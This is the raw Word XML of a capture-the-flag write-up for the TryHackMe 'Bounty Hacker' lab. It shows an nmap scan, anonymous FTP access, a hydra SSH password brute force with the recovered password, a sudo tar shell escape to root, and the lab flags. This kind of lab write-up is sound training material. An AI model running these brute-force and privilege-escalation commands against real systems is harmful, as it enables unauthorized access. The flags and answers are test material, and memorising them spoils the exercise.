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7F9F" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="00022356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  <w:t>Bounty Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5807B327" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A70C871" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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5" w:history="1">
        <w:r w:rsidRPr="00022356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Bounty Hacker</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13C678C3" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Topic's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40137EEC" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F8F269" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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FTP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57787558" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Brute Forcing (SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A8A95" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Misconfigured Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E35943" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Appendix archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E41EBB" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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Password: </w:t>
      </w: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1 kn0w 1 5h0uldn'7!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757BB908" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Living up to the title.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26766497" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers &amp; beef in your future!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDB1ED" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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Deploy the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F85FF" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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No answer needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE46A9F" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Find open ports on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB074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kali@kali:~/CTFs/tryhackme/Bounty Hacker$ sudo nmap -sS -sC -sV -O -A 10.10.156.215</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B37E33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[sudo] password for kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD159C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Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 14:51 CEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132EC8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Nmap scan report for 10.10.156.215</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A89BE9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Host is up (0.031s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4471FB3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 shown: 967 filtered ports, 30 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BEF79E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PORT   STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E60A9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21/tcp open  ftp     vsftpd 3.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3EFB5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ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513C876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|_Can't get directory listing: TIMEOUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A226131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ftp-syst:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F75D2F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STAT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE996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FTP server status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F1F1E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   Connected to ::ffff:10.8.106.222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0929859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   Logged in as ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5999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|      TYPE: ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2112EDA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   No session bandwidth limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E33324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   Session timeout in seconds is 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C79C7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   Control connection is plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087892C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   Data connections will be plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A27FD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   At session startup, client count was 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FBF9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   vsFTPd 3.0.3 - secure, fast, stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C34CA56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|_End of status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0043029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22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C7EB7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ssh-hostkey:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A046EA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2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD4058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   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A58C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|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D4D79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80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1D9BF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|_http-server-header: Apache/2.4.18 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB5677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|_http-title: Site doesn't have a title (text/html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F310A8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Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (89%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D4A64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 exact OS matches for host (test conditions non-ideal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CB890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Network Distance: 2 hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49550CA3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Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2B868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4F95CE6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TRACEROUTE (using port 49154/tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6DCBB4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HOP RTT      ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CA4A9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   31.06 ms 10.8.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5D35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   31.25 ms 10.10.156.215</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A8D3F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5898A64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OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F1CB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Nmap done: 1 IP address (1 host up) scanned in 50.10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E1C2E" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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No answer needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C0048" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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Who wrote the task list?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC38F63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kali@kali:~/CTFs/tryhackme/Bounty Hacker$ ftp 10.10.156.215</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4860C2DF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Connected to 10.10.156.215.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320D33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220 (vsFTPd 3.0.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D545FB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Name (10.10.156.215:kali): anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7DA4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230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE7D03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Remote system type is UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFEA90A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Using binary mode to transfer files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7D361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ftp&gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64F58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200 PORT command successful. Consider using PASV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2CD66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150 Here comes the directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928E488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-rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D4366E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-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483911EC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226 Directory send OK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50715D28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ftp&gt; mget *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F99E1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mget locks.txt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F181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200 PORT command successful. Consider using PASV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D0667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150 Opening BINARY mode data connection for locks.txt (418 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000B464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226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B93053A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418 bytes received in 0.08 secs (5.0435 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C70B3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mget task.txt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BC629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200 PORT command successful. Consider using PASV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1DF87E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150 Opening BINARY mode data connection for task.txt (68 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D2CCDE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226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A4B59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68 bytes received in 0.00 secs (245.9491 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F961F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ftp&gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230D36A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221 Goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B85A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kali@kali:~/CTFs/tryhackme/Bounty Hacker$ cat task.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB3A3C6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1.) Protect Vicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9EB4A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2.) Plan for Red Eye pickup on the moon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F863134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A1A885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-lin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EDFD8D" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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lin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324D2AE" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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What service can you bruteforce with the text file found?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3297C" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B76CD" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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What is the users password?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341980F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kali@kali:~/CTFs/tryhackme/Bounty Hacker$ hydra -l lin -P locks.txt 10.10.156.215 -t 4 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174A206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Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02789F6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8887A2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Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-05 14:58:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C3F3EE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[DATA] max 4 tasks per 1 server, overall 4 tasks, 26 login tries (l:1/p:26), ~7 tries per task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671CB4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[DATA] attacking ssh://10.10.156.215:22/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46911AA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[22][ssh] host: 10.10.156.215   login: lin   password: RedDr4gonSynd1cat3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8055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 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B15C1A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Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-05 14:58:57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24274390" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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RedDr4gonSynd1cat3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1157B75E" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2252A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kali@kali:~/CTFs/tryhackme/Bounty Hacker$ ssh lin@10.10.156.215</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9079D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The authenticity of host '10.10.156.215 (10.10.156.215)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3335E821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ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36170884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Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAE7138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Warning: Permanently added '10.10.156.215' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A2CD6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lin@10.10.156.215's password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D6F02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Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6C20E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D0F896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 Documentation:  https://help.ubuntu.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5816E0B3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 Management:     https://landscape.canonical.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B71A5C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 Support:        https://ubuntu.com/advantage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7ADB0C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3320181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83 packages can be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30705BF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0 updates are security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183CC8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84986E9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Last login: Sun Jun  7 22:23:41 2020 from 192.168.0.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C9552F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lin@bountyhacker:~/Desktop$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D5E349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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D40F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lastRenderedPageBreak/>
        <w:t>lin@bountyhacker:~/Desktop$ cat user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132D8BE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THM{CR1M3_SyNd1C4T3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B1B8A7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lin@bountyhacker:~/Desktop$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B05D162" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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THM{CR1M3_SyNd1C4T3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E79F7" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9B8A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lin@bountyhacker:~/Desktop$ sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D697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[sudo] password for lin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47138D56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Matching Defaults entries for lin on bountyhacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422024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env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BEE039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0ACB08B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User lin may run the following commands on bountyhacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD830F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(root) /bin/tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799C9FC" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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6" w:history="1">
        <w:r w:rsidRPr="00022356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.. / tar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61E6CC3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lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34798C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tar: Removing leading `/' from member names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27D276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 whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1FA92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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B676B4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 cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F48BB1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 ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9FD6E5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root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350407FA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 cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B2D42A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THM{80UN7Y_h4cK3r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45824100" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="000223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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31046C80" w14:textId="77777777" w:rsidR="00022356" w:rsidRPr="00022356" w:rsidRDefault="00022356" w:rsidP="0002235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22356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THM{80UN7Y_h4cK3r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600B9818" w14:textId="77777777" w:rsidR="00022356" w:rsidRDefault="00022356"/>
    <w:sectPr w:rsidR="00022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C8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E227C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A35E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B2ED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D29B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1E6B1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125AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56D8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254BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1730EA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B608D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1521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601DD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4048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0085C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4185D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F219C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ED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737579">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1801217070">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2106805264">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="543831138">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="184831534">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1695689898">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="564418001">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="37321084">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="3561247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56"/>
    <w:rsid w:val="00022356"/>
    <w:rsid w:val="0075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C5BEF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AFB2D024-48B3-1343-9F00-DAA7EEB5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3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2235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22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23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35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tfobins.github.io/gtfobins/tar/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/cowboyhack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Upreti(2409501344)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Suman Upreti(2409501344)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-11T11:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-11T11:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>